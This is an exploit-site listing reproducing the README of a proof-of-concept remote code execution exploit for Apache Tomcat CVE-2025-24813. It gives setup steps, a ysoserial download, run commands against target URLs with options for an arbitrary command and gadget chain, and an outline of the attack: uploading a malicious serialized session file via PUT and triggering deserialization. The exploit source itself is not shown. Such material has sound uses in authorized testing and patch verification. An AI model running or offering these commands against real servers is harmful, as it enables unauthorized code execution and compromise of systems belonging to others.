Exploit for Use of Incorrectly-Resolved Name or Reference in Apache Tomcat CVE-2025-24813

Name: Exploit for Use of Incorrectly-Resolved Name or Reference in Apache Tomcat CVE-2025-24813
Rating: 5 (14 reviews)
2025-07-03 | CVSS 9.8
## https://sploitus.com/exploit?id=0321D89A-CE9C-500D-B7F2-2FD0FF36A73F
# CVE-2025-24813 Apache Tomcat RCE Exploit PoC

This repository contains a proof-of-concept exploit for CVE-2025-24813, a Java
deserialization vulnerability in Apache Tomcat.

Based on
[absholi7ly/POC-CVE-2025-24813/](https://github.com/absholi7ly/POC-CVE-2025-24813/).

## Prerequisites

- Docker

## Setup

1. Install dependencies:

   ```bash
   uv venv
   source .venv/bin/activate
   uv sync
   ```

2. Download ysoserial:

   ```bash
   ./download.sh
   ```

## Usage

### Using Docker (Recommended)

Build and run the exploit in a container:

```bash
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
```

### Direct Execution

Run the exploit directly:

```bash
python main.py <target_url> [options]
```

#### Options

- `--command`: Command to execute (default: `calc.exe`)
- `--ysoserial`: Path to ysoserial.jar (default: `./ysoserial-all.jar`)
- `--gadget`: ysoserial gadget chain (default: `CommonsCollections6`)
- `--payload_type`: Payload type - `ysoserial` or `java` (default: `ysoserial`)
- `--no-ssl-verify`: Disable SSL verification

#### Examples

```bash
# Basic usage
python main.py http://target:8080

# Custom command
python main.py http://target:8080 --command "whoami"

# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
```

## How it Works

1. Checks if the target servlet is writable via PUT requests
2. Generates a malicious serialized Java payload
3. Uploads the payload as a session file
4. Triggers deserialization by accessing the session

## Disclaimer

This tool is for educational and authorized testing purposes only. Do not use
against systems you do not own or have explicit permission to test.

## References

- <https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html>
- <https://nvd.nist.gov/vuln/detail/CVE-2025-24813>
- <https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md>